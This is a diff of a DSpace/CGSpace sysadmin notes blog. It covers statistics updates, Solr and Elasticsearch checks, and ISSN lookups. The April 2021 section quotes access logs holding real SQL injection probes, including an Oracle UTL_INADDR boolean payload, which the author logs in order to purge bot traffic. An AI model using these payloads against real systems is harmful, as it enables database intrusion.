</span></span><span style="display:flex;"><span>java.lang.OutOfMemoryError: GC overhead limit exceeded
</span></span></code></pre></div><ul>
<li>I guess we really do have to use <code>-r 100</code></li>
<li>Now the thing runs for a few minutes and &ldquo;finishes&rdquo;:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ chrt -b <span style="color:#ae81ff">0</span> dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -r <span style="color:#ae81ff">100</span> -c statistics -t <span style="color:#ae81ff">12</span>
Loading @mire database changes for module MQM
Changes have been processed
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>*************************
* Update Script Started *
*************************
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Run 1
Start updating Solr Storage Reports | Wed Mar 24 14:42:17 CET 2021
Deleting old storage docs from Solr... | Wed Mar 24 14:42:17 CET 2021
Done. | Wed Mar 24 14:42:17 CET 2021
Processing storage reports for type: eperson | Wed Mar 24 14:42:17 CET 2021
Done. | Wed Mar 24 14:42:41 CET 2021
Processing storage reports for type: group | Wed Mar 24 14:42:41 CET 2021
Done. | Wed Mar 24 14:45:46 CET 2021
Processing storage reports for type: collection | Wed Mar 24 14:45:46 CET 2021
Done. | Wed Mar 24 14:45:54 CET 2021
Processing storage reports for type: community | Wed Mar 24 14:45:54 CET 2021
Done. | Wed Mar 24 14:45:58 CET 2021
Committing to Solr... | Wed Mar 24 14:45:58 CET 2021
Done. | Wed Mar 24 14:45:59 CET 2021
Successfully finished updating Solr Storage Reports | Wed Mar 24 14:45:59 CET 2021
Run 1 —   2% — 100/4,824 docs — 3m 47s — 3m 47s
Run 1 —   4% — 200/4,824 docs — 2s — 3m 50s
Run 1 —   6% — 300/4,824 docs — 2s — 3m 53s
Run 1 —   8% — 400/4,824 docs — 2s — 3m 55s
Run 1 —  10% — 500/4,824 docs — 2s — 3m 58s
Run 1 —  12% — 600/4,824 docs — 2s — 4m 1s
Run 1 —  15% — 700/4,824 docs — 2s — 4m 3s
Run 1 —  17% — 800/4,824 docs — 2s — 4m 6s
Run 1 —  19% — 900/4,824 docs — 2s — 4m 9s
Run 1 —  21% — 1,000/4,824 docs — 2s — 4m 11s
Run 1 —  23% — 1,100/4,824 docs — 2s — 4m 14s
Run 1 —  25% — 1,200/4,824 docs — 2s — 4m 16s
Run 1 —  27% — 1,300/4,824 docs — 2s — 4m 19s
Run 1 —  29% — 1,400/4,824 docs — 2s — 4m 22s
Run 1 —  31% — 1,500/4,824 docs — 2s — 4m 24s
Run 1 —  33% — 1,600/4,824 docs — 2s — 4m 27s
Run 1 —  35% — 1,700/4,824 docs — 2s — 4m 29s
Run 1 —  37% — 1,800/4,824 docs — 2s — 4m 32s
Run 1 —  39% — 1,900/4,824 docs — 2s — 4m 35s
Run 1 —  41% — 2,000/4,824 docs — 2s — 4m 37s
Run 1 —  44% — 2,100/4,824 docs — 2s — 4m 40s
Run 1 —  46% — 2,200/4,824 docs — 2s — 4m 42s
Run 1 —  48% — 2,300/4,824 docs — 2s — 4m 45s
Run 1 —  50% — 2,400/4,824 docs — 2s — 4m 48s
Run 1 —  52% — 2,500/4,824 docs — 2s — 4m 50s
Run 1 —  54% — 2,600/4,824 docs — 2s — 4m 53s
Run 1 —  56% — 2,700/4,824 docs — 2s — 4m 55s
Run 1 —  58% — 2,800/4,824 docs — 2s — 4m 58s
Run 1 —  60% — 2,900/4,824 docs — 2s — 5m 1s
Run 1 —  62% — 3,000/4,824 docs — 2s — 5m 3s
Run 1 —  64% — 3,100/4,824 docs — 2s — 5m 6s
Run 1 —  66% — 3,200/4,824 docs — 3s — 5m 9s
Run 1 —  68% — 3,300/4,824 docs — 2s — 5m 12s
Run 1 —  70% — 3,400/4,824 docs — 2s — 5m 14s
Run 1 —  73% — 3,500/4,824 docs — 2s — 5m 17s
Run 1 —  75% — 3,600/4,824 docs — 2s — 5m 20s
Run 1 —  77% — 3,700/4,824 docs — 2s — 5m 22s
Run 1 —  79% — 3,800/4,824 docs — 2s — 5m 25s
Run 1 —  81% — 3,900/4,824 docs — 2s — 5m 27s
Run 1 —  83% — 4,000/4,824 docs — 2s — 5m 30s
Run 1 —  85% — 4,100/4,824 docs — 2s — 5m 33s
Run 1 —  87% — 4,200/4,824 docs — 2s — 5m 35s
Run 1 —  89% — 4,300/4,824 docs — 2s — 5m 38s
Run 1 —  91% — 4,400/4,824 docs — 2s — 5m 41s
Run 1 —  93% — 4,500/4,824 docs — 2s — 5m 43s
Run 1 —  95% — 4,600/4,824 docs — 2s — 5m 46s
Run 1 —  97% — 4,700/4,824 docs — 2s — 5m 49s
Run 1 — 100% — 4,800/4,824 docs — 2s — 5m 51s
Run 1 — 100% — 4,824/4,824 docs — 2s — 5m 53s
Run 1 took 5m 53s
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>**************************
* Update Script Finished *
**************************
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -r <span style="color:#ae81ff">100</span> -c statistics -t <span style="color:#ae81ff">12</span>
</span></span><span style="display:flex;"><span>Loading @mire database changes for module MQM
</span></span><span style="display:flex;"><span>Changes have been processed
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>*************************
</span></span><span style="display:flex;"><span>* Update Script Started *
</span></span><span style="display:flex;"><span>*************************
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Run 1
</span></span><span style="display:flex;"><span>Start updating Solr Storage Reports | Wed Mar 24 14:42:17 CET 2021
</span></span><span style="display:flex;"><span>Deleting old storage docs from Solr... | Wed Mar 24 14:42:17 CET 2021
</span></span><span style="display:flex;"><span>Done. | Wed Mar 24 14:42:17 CET 2021
</span></span><span style="display:flex;"><span>Processing storage reports for type: eperson | Wed Mar 24 14:42:17 CET 2021
</span></span><span style="display:flex;"><span>Done. | Wed Mar 24 14:42:41 CET 2021
</span></span><span style="display:flex;"><span>Processing storage reports for type: group | Wed Mar 24 14:42:41 CET 2021
</span></span><span style="display:flex;"><span>Done. | Wed Mar 24 14:45:46 CET 2021
</span></span><span style="display:flex;"><span>Processing storage reports for type: collection | Wed Mar 24 14:45:46 CET 2021
</span></span><span style="display:flex;"><span>Done. | Wed Mar 24 14:45:54 CET 2021
</span></span><span style="display:flex;"><span>Processing storage reports for type: community | Wed Mar 24 14:45:54 CET 2021
</span></span><span style="display:flex;"><span>Done. | Wed Mar 24 14:45:58 CET 2021
</span></span><span style="display:flex;"><span>Committing to Solr... | Wed Mar 24 14:45:58 CET 2021
</span></span><span style="display:flex;"><span>Done. | Wed Mar 24 14:45:59 CET 2021
</span></span><span style="display:flex;"><span>Successfully finished updating Solr Storage Reports | Wed Mar 24 14:45:59 CET 2021
</span></span><span style="display:flex;"><span>Run 1 —   2% — 100/4,824 docs — 3m 47s — 3m 47s
</span></span><span style="display:flex;"><span>Run 1 —   4% — 200/4,824 docs — 2s — 3m 50s
</span></span><span style="display:flex;"><span>Run 1 —   6% — 300/4,824 docs — 2s — 3m 53s
</span></span><span style="display:flex;"><span>Run 1 —   8% — 400/4,824 docs — 2s — 3m 55s
</span></span><span style="display:flex;"><span>Run 1 —  10% — 500/4,824 docs — 2s — 3m 58s
</span></span><span style="display:flex;"><span>Run 1 —  12% — 600/4,824 docs — 2s — 4m 1s
</span></span><span style="display:flex;"><span>Run 1 —  15% — 700/4,824 docs — 2s — 4m 3s
</span></span><span style="display:flex;"><span>Run 1 —  17% — 800/4,824 docs — 2s — 4m 6s
</span></span><span style="display:flex;"><span>Run 1 —  19% — 900/4,824 docs — 2s — 4m 9s
</span></span><span style="display:flex;"><span>Run 1 —  21% — 1,000/4,824 docs — 2s — 4m 11s
</span></span><span style="display:flex;"><span>Run 1 —  23% — 1,100/4,824 docs — 2s — 4m 14s
</span></span><span style="display:flex;"><span>Run 1 —  25% — 1,200/4,824 docs — 2s — 4m 16s
</span></span><span style="display:flex;"><span>Run 1 —  27% — 1,300/4,824 docs — 2s — 4m 19s
</span></span><span style="display:flex;"><span>Run 1 —  29% — 1,400/4,824 docs — 2s — 4m 22s
</span></span><span style="display:flex;"><span>Run 1 —  31% — 1,500/4,824 docs — 2s — 4m 24s
</span></span><span style="display:flex;"><span>Run 1 —  33% — 1,600/4,824 docs — 2s — 4m 27s
</span></span><span style="display:flex;"><span>Run 1 —  35% — 1,700/4,824 docs — 2s — 4m 29s
</span></span><span style="display:flex;"><span>Run 1 —  37% — 1,800/4,824 docs — 2s — 4m 32s
</span></span><span style="display:flex;"><span>Run 1 —  39% — 1,900/4,824 docs — 2s — 4m 35s
</span></span><span style="display:flex;"><span>Run 1 —  41% — 2,000/4,824 docs — 2s — 4m 37s
</span></span><span style="display:flex;"><span>Run 1 —  44% — 2,100/4,824 docs — 2s — 4m 40s
</span></span><span style="display:flex;"><span>Run 1 —  46% — 2,200/4,824 docs — 2s — 4m 42s
</span></span><span style="display:flex;"><span>Run 1 —  48% — 2,300/4,824 docs — 2s — 4m 45s
</span></span><span style="display:flex;"><span>Run 1 —  50% — 2,400/4,824 docs — 2s — 4m 48s
</span></span><span style="display:flex;"><span>Run 1 —  52% — 2,500/4,824 docs — 2s — 4m 50s
</span></span><span style="display:flex;"><span>Run 1 —  54% — 2,600/4,824 docs — 2s — 4m 53s
</span></span><span style="display:flex;"><span>Run 1 —  56% — 2,700/4,824 docs — 2s — 4m 55s
</span></span><span style="display:flex;"><span>Run 1 —  58% — 2,800/4,824 docs — 2s — 4m 58s
</span></span><span style="display:flex;"><span>Run 1 —  60% — 2,900/4,824 docs — 2s — 5m 1s
</span></span><span style="display:flex;"><span>Run 1 —  62% — 3,000/4,824 docs — 2s — 5m 3s
</span></span><span style="display:flex;"><span>Run 1 —  64% — 3,100/4,824 docs — 2s — 5m 6s
</span></span><span style="display:flex;"><span>Run 1 —  66% — 3,200/4,824 docs — 3s — 5m 9s
</span></span><span style="display:flex;"><span>Run 1 —  68% — 3,300/4,824 docs — 2s — 5m 12s
</span></span><span style="display:flex;"><span>Run 1 —  70% — 3,400/4,824 docs — 2s — 5m 14s
</span></span><span style="display:flex;"><span>Run 1 —  73% — 3,500/4,824 docs — 2s — 5m 17s
</span></span><span style="display:flex;"><span>Run 1 —  75% — 3,600/4,824 docs — 2s — 5m 20s
</span></span><span style="display:flex;"><span>Run 1 —  77% — 3,700/4,824 docs — 2s — 5m 22s
</span></span><span style="display:flex;"><span>Run 1 —  79% — 3,800/4,824 docs — 2s — 5m 25s
</span></span><span style="display:flex;"><span>Run 1 —  81% — 3,900/4,824 docs — 2s — 5m 27s
</span></span><span style="display:flex;"><span>Run 1 —  83% — 4,000/4,824 docs — 2s — 5m 30s
</span></span><span style="display:flex;"><span>Run 1 —  85% — 4,100/4,824 docs — 2s — 5m 33s
</span></span><span style="display:flex;"><span>Run 1 —  87% — 4,200/4,824 docs — 2s — 5m 35s
</span></span><span style="display:flex;"><span>Run 1 —  89% — 4,300/4,824 docs — 2s — 5m 38s
</span></span><span style="display:flex;"><span>Run 1 —  91% — 4,400/4,824 docs — 2s — 5m 41s
</span></span><span style="display:flex;"><span>Run 1 —  93% — 4,500/4,824 docs — 2s — 5m 43s
</span></span><span style="display:flex;"><span>Run 1 —  95% — 4,600/4,824 docs — 2s — 5m 46s
</span></span><span style="display:flex;"><span>Run 1 —  97% — 4,700/4,824 docs — 2s — 5m 49s
</span></span><span style="display:flex;"><span>Run 1 — 100% — 4,800/4,824 docs — 2s — 5m 51s
</span></span><span style="display:flex;"><span>Run 1 — 100% — 4,824/4,824 docs — 2s — 5m 53s
</span></span><span style="display:flex;"><span>Run 1 took 5m 53s
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>**************************
</span></span><span style="display:flex;"><span>* Update Script Finished *
</span></span><span style="display:flex;"><span>**************************
</span></span></code></pre></div><ul>
<li>If I run it again it finds the same 4,824 docs and processes them&hellip;
<ul>
<li>I asked Atmire for feedback on this: <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=839">https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=839</a></li>
@ -796,8 +796,8 @@ Run 1 took 5m 53s
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">2021-03-29 08:55:40,073 INFO org.apache.solr.core.SolrCore @ [search] webapp=/solr path=/select params={q=Gender+mainstreaming+in+local+potato+seed+system+in+Georgia&amp;fl=handle,search.resourcetype,search.resourceid,search.uniqueid&amp;start=0&amp;fq=NOT(withdrawn:true)&amp;fq=NOT(discoverable:false)&amp;fq=-location:l5308ea39-7c65-401b-890b-c2b93dad649a&amp;wt=javabin&amp;version=2} hits=143 status=0 QTime=0
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>2021-03-29 08:55:40,073 INFO org.apache.solr.core.SolrCore @ [search] webapp=/solr path=/select params={q=Gender+mainstreaming+in+local+potato+seed+system+in+Georgia&amp;fl=handle,search.resourcetype,search.resourceid,search.uniqueid&amp;start=0&amp;fq=NOT(withdrawn:true)&amp;fq=NOT(discoverable:false)&amp;fq=-location:l5308ea39-7c65-401b-890b-c2b93dad649a&amp;wt=javabin&amp;version=2} hits=143 status=0 QTime=0
</span></span></code></pre></div><ul>
<li>But the item mapper only displays ten items, with no pagination
<ul>
<li>There is no way to search by handle or ID</li>
@ -836,18 +836,18 @@ Run 1 took 5m 53s
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python"><span style="color:#f92672">import</span> requests
query_params <span style="color:#f92672">=</span> {<span style="color:#e6db74">&#39;item-type&#39;</span>: <span style="color:#e6db74">&#39;publication&#39;</span>, <span style="color:#e6db74">&#39;format&#39;</span>: <span style="color:#e6db74">&#39;Json&#39;</span>, <span style="color:#e6db74">&#39;limit&#39;</span>: <span style="color:#ae81ff">10</span>, <span style="color:#e6db74">&#39;offset&#39;</span>: <span style="color:#ae81ff">0</span>, <span style="color:#e6db74">&#39;api-key&#39;</span>: <span style="color:#e6db74">&#39;blahhhahahah&#39;</span>, <span style="color:#e6db74">&#39;filter&#39;</span>: <span style="color:#e6db74">&#39;[[&#34;issn&#34;,&#34;equals&#34;,&#34;0011-183X&#34;]]&#39;</span>}
r <span style="color:#f92672">=</span> requests<span style="color:#f92672">.</span>get(<span style="color:#e6db74">&#39;https://v2.sherpa.ac.uk/cgi/retrieve&#39;</span>)
<span style="color:#66d9ef">if</span> r<span style="color:#f92672">.</span>status_code <span style="color:#f92672">and</span> len(r<span style="color:#f92672">.</span>json()[<span style="color:#e6db74">&#39;items&#39;</span>]) <span style="color:#f92672">&gt;</span> <span style="color:#ae81ff">0</span>:
r<span style="color:#f92672">.</span>json()[<span style="color:#e6db74">&#39;items&#39;</span>][<span style="color:#ae81ff">0</span>][<span style="color:#e6db74">&#39;title&#39;</span>][<span style="color:#ae81ff">0</span>][<span style="color:#e6db74">&#39;title&#39;</span>]
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">import</span> requests
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>query_params <span style="color:#f92672">=</span> {<span style="color:#e6db74">&#39;item-type&#39;</span>: <span style="color:#e6db74">&#39;publication&#39;</span>, <span style="color:#e6db74">&#39;format&#39;</span>: <span style="color:#e6db74">&#39;Json&#39;</span>, <span style="color:#e6db74">&#39;limit&#39;</span>: <span style="color:#ae81ff">10</span>, <span style="color:#e6db74">&#39;offset&#39;</span>: <span style="color:#ae81ff">0</span>, <span style="color:#e6db74">&#39;api-key&#39;</span>: <span style="color:#e6db74">&#39;blahhhahahah&#39;</span>, <span style="color:#e6db74">&#39;filter&#39;</span>: <span style="color:#e6db74">&#39;[[&#34;issn&#34;,&#34;equals&#34;,&#34;0011-183X&#34;]]&#39;</span>}
</span></span><span style="display:flex;"><span>r <span style="color:#f92672">=</span> requests<span style="color:#f92672">.</span>get(<span style="color:#e6db74">&#39;https://v2.sherpa.ac.uk/cgi/retrieve&#39;</span>)
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> r<span style="color:#f92672">.</span>status_code <span style="color:#f92672">and</span> len(r<span style="color:#f92672">.</span>json()[<span style="color:#e6db74">&#39;items&#39;</span>]) <span style="color:#f92672">&gt;</span> <span style="color:#ae81ff">0</span>:
</span></span><span style="display:flex;"><span> r<span style="color:#f92672">.</span>json()[<span style="color:#e6db74">&#39;items&#39;</span>][<span style="color:#ae81ff">0</span>][<span style="color:#e6db74">&#39;title&#39;</span>][<span style="color:#ae81ff">0</span>][<span style="color:#e6db74">&#39;title&#39;</span>]
</span></span></code></pre></div><ul>
<li>I exported a list of all our ISSNs from CGSpace:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=253) to /tmp/2021-03-31-issns.csv;
COPY 3081
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=253) to /tmp/2021-03-31-issns.csv;
</span></span><span style="display:flex;"><span>COPY 3081
</span></span></code></pre></div><ul>
<li>I wrote a script to check the ISSNs against Crossref&rsquo;s API: <code>crossref-issn-lookup.py</code>
<ul>
<li>I suspect Crossref might have better data actually&hellip;</li>

File diff suppressed because it is too large Load Diff

View File

@ -36,7 +36,7 @@ I looked at the top user agents and IPs in the Solr statistics for last month an
I will add the RI/1.0 pattern to our DSpace agents overload and purge them from Solr (we had previously seen this agent with 9,000 hits or so in 2020-09), but I think I will leave the Microsoft Word one&hellip; as that&rsquo;s an actual user&hellip;
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -147,17 +147,17 @@ I will add the RI/1.0 pattern to our DSpace agents overload and purge them from
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">193.169.254.178 - - [21/Apr/2021:01:59:01 +0200] &#34;GET /rest/collections/1179/items?limit=812&amp;expand=metadata\x22%20and%20\x2221\x22=\x2221 HTTP/1.1&#34; 400 5 &#34;-&#34; &#34;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)&#34;
193.169.254.178 - - [21/Apr/2021:02:00:36 +0200] &#34;GET /rest/collections/1179/items?limit=812&amp;expand=metadata-21%2B21*01 HTTP/1.1&#34; 200 458201 &#34;-&#34; &#34;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)&#34;
193.169.254.178 - - [21/Apr/2021:02:00:36 +0200] &#34;GET /rest/collections/1179/items?limit=812&amp;expand=metadata&#39;||lower(&#39;&#39;)||&#39; HTTP/1.1&#34; 400 5 &#34;-&#34; &#34;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)&#34;
193.169.254.178 - - [21/Apr/2021:02:02:10 +0200] &#34;GET /rest/collections/1179/items?limit=812&amp;expand=metadata&#39;%2Brtrim(&#39;&#39;)%2B&#39; HTTP/1.1&#34; 200 458209 &#34;-&#34; &#34;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)&#34;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>193.169.254.178 - - [21/Apr/2021:01:59:01 +0200] &#34;GET /rest/collections/1179/items?limit=812&amp;expand=metadata\x22%20and%20\x2221\x22=\x2221 HTTP/1.1&#34; 400 5 &#34;-&#34; &#34;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)&#34;
</span></span><span style="display:flex;"><span>193.169.254.178 - - [21/Apr/2021:02:00:36 +0200] &#34;GET /rest/collections/1179/items?limit=812&amp;expand=metadata-21%2B21*01 HTTP/1.1&#34; 200 458201 &#34;-&#34; &#34;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)&#34;
</span></span><span style="display:flex;"><span>193.169.254.178 - - [21/Apr/2021:02:00:36 +0200] &#34;GET /rest/collections/1179/items?limit=812&amp;expand=metadata&#39;||lower(&#39;&#39;)||&#39; HTTP/1.1&#34; 400 5 &#34;-&#34; &#34;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)&#34;
</span></span><span style="display:flex;"><span>193.169.254.178 - - [21/Apr/2021:02:02:10 +0200] &#34;GET /rest/collections/1179/items?limit=812&amp;expand=metadata&#39;%2Brtrim(&#39;&#39;)%2B&#39; HTTP/1.1&#34; 200 458209 &#34;-&#34; &#34;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)&#34;
</span></span></code></pre></div><ul>
<li>I will report the IP on abuseipdb.com and purge their hits from Solr</li>
<li>The second IP is in Colombia and is making thousands of requests for what looks like some test site:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">181.62.166.177 - - [20/Apr/2021:22:48:42 +0200] &#34;GET /rest/collections/d1e11546-c62a-4aee-af91-fd482b3e7653/items?expand=metadata HTTP/2.0&#34; 200 123613 &#34;http://cassavalighthousetest.org/&#34; &#34;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36&#34;
181.62.166.177 - - [20/Apr/2021:22:55:39 +0200] &#34;GET /rest/collections/d1e11546-c62a-4aee-af91-fd482b3e7653/items?expand=metadata HTTP/2.0&#34; 200 123613 &#34;http://cassavalighthousetest.org/&#34; &#34;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36&#34;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>181.62.166.177 - - [20/Apr/2021:22:48:42 +0200] &#34;GET /rest/collections/d1e11546-c62a-4aee-af91-fd482b3e7653/items?expand=metadata HTTP/2.0&#34; 200 123613 &#34;http://cassavalighthousetest.org/&#34; &#34;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36&#34;
</span></span><span style="display:flex;"><span>181.62.166.177 - - [20/Apr/2021:22:55:39 +0200] &#34;GET /rest/collections/d1e11546-c62a-4aee-af91-fd482b3e7653/items?expand=metadata HTTP/2.0&#34; 200 123613 &#34;http://cassavalighthousetest.org/&#34; &#34;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36&#34;
</span></span></code></pre></div><ul>
<li>But this site does not exist (yet?)
<ul>
<li>I will purge them from Solr</li>
@ -165,46 +165,46 @@ I will add the RI/1.0 pattern to our DSpace agents overload and purge them from
</li>
<li>The third IP is in Russia apparently, and the user agent has the <code>pl-PL</code> locale with thousands of requests like this:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">45.146.166.180 - - [18/Apr/2021:16:28:44 +0200] &#34;GET /bitstream/handle/10947/4153/.AAS%202014%20Annual%20Report.pdf?sequence=1%22%29%29%20AND%201691%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281691%3D1691%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%29%20AND%20%28%28%22RKbp%22%3D%22RKbp&amp;isAllowed=y HTTP/1.1&#34; 200 918998 &#34;http://cgspace.cgiar.org:80/bitstream/handle/10947/4153/.AAS 2014 Annual Report.pdf&#34; &#34;Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL) AppleWebKit/523.15 (KHTML, like Gecko) Version/3.0 Safari/523.15&#34;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>45.146.166.180 - - [18/Apr/2021:16:28:44 +0200] &#34;GET /bitstream/handle/10947/4153/.AAS%202014%20Annual%20Report.pdf?sequence=1%22%29%29%20AND%201691%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281691%3D1691%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%29%20AND%20%28%28%22RKbp%22%3D%22RKbp&amp;isAllowed=y HTTP/1.1&#34; 200 918998 &#34;http://cgspace.cgiar.org:80/bitstream/handle/10947/4153/.AAS 2014 Annual Report.pdf&#34; &#34;Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL) AppleWebKit/523.15 (KHTML, like Gecko) Version/3.0 Safari/523.15&#34;
</span></span></code></pre></div><ul>
<li>I will purge these all with my <code>check-spider-ip-hits.sh</code> script:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
Purging 21648 hits from 193.169.254.178 in statistics
Purging 20323 hits from 181.62.166.177 in statistics
Purging 19376 hits from 45.146.166.180 in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 61347
</code></pre></div><h2 id="2021-05-02">2021-05-02</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
</span></span><span style="display:flex;"><span>Purging 21648 hits from 193.169.254.178 in statistics
</span></span><span style="display:flex;"><span>Purging 20323 hits from 181.62.166.177 in statistics
</span></span><span style="display:flex;"><span>Purging 19376 hits from 45.146.166.180 in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 61347
</span></span></code></pre></div><h2 id="2021-05-02">2021-05-02</h2>
<ul>
<li>Check the AReS Harvester indexes:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
yellow open openrxv-items-temp H-CGsyyLTaqAj6-nKXZ-7w 1 1 0 0 283b 283b
yellow open openrxv-items-final ul3SKsa7Q9Cd_K7qokBY_w 1 1 103951 0 254mb 254mb
$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool
...
